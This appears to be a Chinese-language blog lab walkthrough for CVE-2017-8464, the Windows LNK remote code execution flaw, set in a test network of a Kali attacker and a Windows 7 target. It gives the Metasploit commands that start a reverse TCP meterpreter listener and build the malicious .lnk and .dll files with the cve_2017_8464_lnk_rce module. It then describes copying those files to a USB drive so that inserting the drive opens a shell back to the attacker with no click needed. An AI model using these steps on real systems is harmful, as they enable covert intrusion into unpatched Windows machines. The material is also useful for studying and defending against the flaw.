17年的问题,最近清理以前磁盘的文件发现这个记录文档,写在这里。
引言微软在2017年6月中旬发布的补丁包中包含了一个关于LNK文件远程代码执行的漏洞,CVE编号为CVE-2017-8464,描述如果系统处理了恶意的.LNK文件,则可能允许远程执行代码,成功利用这个漏洞会获得与本地用户相同的用户权限,攻击者可以通过任意可移动驱动器(如U盘)或者远程共享的方式传播攻击。我们以U盘测试,当受害者主机加载该U盘即会受到攻击,无需受害者手动点击访问U盘,断开U盘shell会话保持。
当时影响任何未安装CVE-2017-8464补丁的Windows系统,可绕过MS10-046 & MS15-020补丁防护,涉及Microsoft Windows 10、Microsoft Windows 7、Microsoft Windows 8、Microsoft Windows 8.1、Microsoft Windows Server 2008、Microsoft Windows Server 2012、Microsoft Windows Server 2016。
漏洞利用测试环境:
攻击机:kali 2.0(192.168.80.226)
靶机:win7 x64(192.168.80.114)
1、下载exp放在kali对应目录(新版kali应该已经自带了),此处以放在该测试目录为例(kali2.0:/usr/share/metasploit-framework/modules/exploit/windows/smb/),在kali里配置监听
msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcpPAYLOAD =电脑> windows/x64/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.80.226LHOST => 192.168.80.226msf exploit(handler) > exploit -j[*] Exploit running as background job.[*] Started reverse TCP handler on 192.168.80.226:4444msf exploit(handler) > [*] Starting the payload handler...back
msf > use exploit/windows/smb/cve_2017_8464_lnk_rcemsf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcpPAYLOAD => windows/x64/meterpreter/reverse_tcpmsf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.80.226LHOST => 192.168.80.226
msf exploit(cve_2017_8464_lnk_rce) > exploit
执行成功后会在/root/.msf4/local/*目录生成.dll和.lnk文件
2、在kali里加载U盘,复制文件到U盘根目录
查看加载的U盘:
电脑将kali目录 /root/.msf4/local/* 下的 .lnk文件复制到U盘根目录
复制完成后的U盘根目录
3、在靶机上插入U盘,无需手动点击访问U盘,靶机即可受到攻击,测试在win7靶机中插入U盘时,kali攻击机收到反弹的shell
电脑电脑 电脑